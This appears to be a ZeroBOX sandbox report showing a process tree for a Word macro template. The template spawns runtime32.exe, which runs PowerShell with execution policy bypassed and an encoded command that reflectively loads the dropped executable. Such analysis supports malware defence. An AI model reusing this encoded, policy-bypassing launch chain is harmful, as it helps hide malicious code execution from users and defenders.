| ZeroBOX

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\template.dotm
1080
- runtime32.exe C:\Users\test22\AppData\Local\Temp\runtime32.exe
  2164
  - powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA4ADAAYwA0AGYANQA3AGUALQAwAGYAZQA1AC0ANABkADUANwAtAGIAZQA0ADgALQBjADQAOQBlAGIAOAA1ADEAZAA3AGMAYwAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXAB0AGUAcwB0ADIAMgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAcgB1AG4AdABpAG0AZQAzADIALgBlAHgAZQAnADsAdAByAHkAIAB7AA0ACgAgACAAaQBmACAAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBnAGUAIAA0ACkADQAKACAAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBVAG4AcwBhAGYAZQBMAG8AYQBkAEYAcgBvAG0AKAAkAHkAKQAgAH0AIABlAGwAcwBlACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABGAGkAbABlACgAJAB5ACkAfQANAAoAIAAgAC4AIAAoAFsAXwAzADIALgBfADgAOABdADoAOgBfADcANAAoACQAeAApACkADQAKACAAIABlAHgAaQB0ACAAJABMAEEAUwBUAEUAWABJAFQAQwBPAEQARQANAAoAfQAgAA0ACgBjAGEAdABjAGgAIABbAE4AbwB0AFMAdQBwAHAAbwByAHQAZQBkAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIABsAG8AYwBhAHQAaQBvAG4AIABpAHMAIAB1AG4AdAByAHUAcwB0AGUAZAAuACAAQwBvAHAAeQAgAGYAaQBsAGUAIAB0AG8AIABhACAAbABvAGMAYQBsACAAZAByAGkAdgBlACwAIABhAG4AZAAgAHQAcgB5ACAAYQBnAGEAaQBuAC4AJwAgAC0ARgBvAHIAZQBnAHIAbwB1AG4AZABDAG8AbABvAHIAIABSAGUAZAANAAoAfQANAAoAYwBhAHQAYwBoACAAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAoACIARQByAHIAbwByADoAIAAiACAAKwAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=
    2312

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents